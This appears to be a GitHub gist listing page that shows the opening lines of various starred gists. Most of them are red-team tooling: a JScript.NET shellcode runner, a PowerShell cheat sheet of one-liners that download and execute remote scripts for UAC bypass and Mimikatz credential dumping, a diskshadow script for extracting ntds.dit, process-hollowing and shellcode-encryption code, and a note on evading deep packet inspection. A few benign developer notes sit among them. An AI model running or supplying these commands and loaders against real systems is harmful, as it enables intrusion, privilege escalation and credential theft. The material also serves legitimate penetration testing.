Skip to content

Instantly share code, notes, and snippets.

View ChoiSG's full-sized avatar

ChoI ChoiSG

143 followers · 59 following
View GitHub Profile
@Ridter
Ridter / shellcode.js
Last active November 8, 2023 21:01
Execute ShellCode Via Jscript.NET
import System;
import System.Runtime.InteropServices;
import System.Reflection;
import System.Reflection.Emit;
import System.Runtime;
import System.Text;
//C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js
@curi0usJack
curi0usJack / .htaccess
Last active June 6, 2024 18:04
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
@DustinCampbell
DustinCampbell / using-msbuildworkspace.md
Created April 10, 2018 21:36
Using MSBuildWorkspace

Introduction

Roslyn provides a rich set of APIs for analyzing C# and Visual Basic source code, but constructing a context in which to perform analysis can be challenging. For simple tasks, creating a Compilation populated with SyntaxTrees, MetadataReferences and a handful of options may suffice. However, if there are multiple projects involved in the analysis, it is more complicated because multiple Compilations need to be created with references between them.

To simplify the construction process. Roslyn provides the Workspace API, which can be used to model solutions, projects and documents. The Workspace API performs all of the heavy lifting needed to parse SyntaxTrees from source code, load MetadataReferences, and construct Compilations and add references between them.

@jivoi
jivoi / RedTeam_CheatSheet.ps1
Created July 14, 2018 14:52 — forked from m8sec/RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@b1gbroth3r
b1gbroth3r / diskshadow.txt
Last active February 10, 2022 20:27
Automates retrieval of system hive & ntds.dit using diskshadow.exe for password auditing/hash cracking. Modify where necessary. Please verify that the Z: drive isn't already mapped on the DC before running this. Running unix2dos against the .txt and .cmd files wouldn't hurt either.
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec scriptfile.cmd
delete shadows volume %someAlias%
reset
exit
@Neo23x0
Neo23x0 / help.md
Last active July 30, 2023 12:19
Offensive Research Guide to Help Defense Improve Detection

I've transformed this gist into a git repository.

Whenever you research a certain vulnerability ask yourself these questions and please answer them for us

Logging

Does the exploited service write a log?
(check ls -lrt /var/log or lsof +D /var/log/ or lsof | grep servicename)

@med0x2e
med0x2e / process-hollowing.cs
Last active November 4, 2021 12:49
Process Hollowing (slightly updated to work with G2JS) - credits for the initial code go to @smgorelik and @ambray
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;
namespace Hollowing
{
public class Loader
{
public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe");
@davidfowl
davidfowl / MinimalAPIs.md
Last active June 24, 2024 06:15
Minimal APIs at a glance
@jackullrich
jackullrich / mainc.c
Last active November 3, 2023 17:20
Single Step Encryption/Decryption
#include <Windows.h>
LONG SingleStepEncryptDecrypt(EXCEPTION_POINTERS* ExceptionInfo);
typedef VOID(__stdcall* Shellcode)();
LPBYTE ShellcodeBuffer;
ULONG_PTR PreviousOffset;
ULONG_PTR CurrentOffset;
ULONGLONG InstructionCount;
DWORD dwOld;
@gmurdocca
gmurdocca / socat_caesar_dpi.md
Last active January 22, 2024 05:08
Circumventing Deep Packet Inspection with Socat and rot13

Circumventing Deep Packet Inspection with Socat and rot13

I have a Linux virtual machine inside a customer's private network. For security, this VM is reachable only via VPN + Citrix + Windows + a Windows SSH client (eg PuTTY). I am tasked to ensure this Citrix design is secure, and users can not access their Linux VM's or other resources on the internal private network in any way outside of using Citrix.

The VM can access the internet. This task should be easy. The VM's internet gateway allows it to connect anywhere on the internet to TCP ports 80, 443, and 8090 only. Connecting to an internet bastion box on one of these ports works and I can send and receive clear text data using netcat. I plan to use good old SSH, listening on tcp/8090 on the bastion, with a reverse port forward configured to expose sshd on the VM to the public, to show their Citrix gateway can be circumvented.

Rejected by Deep Packet Inspection

I hit an immediate snag. The moment I try to establish an SSH or SSL connection over o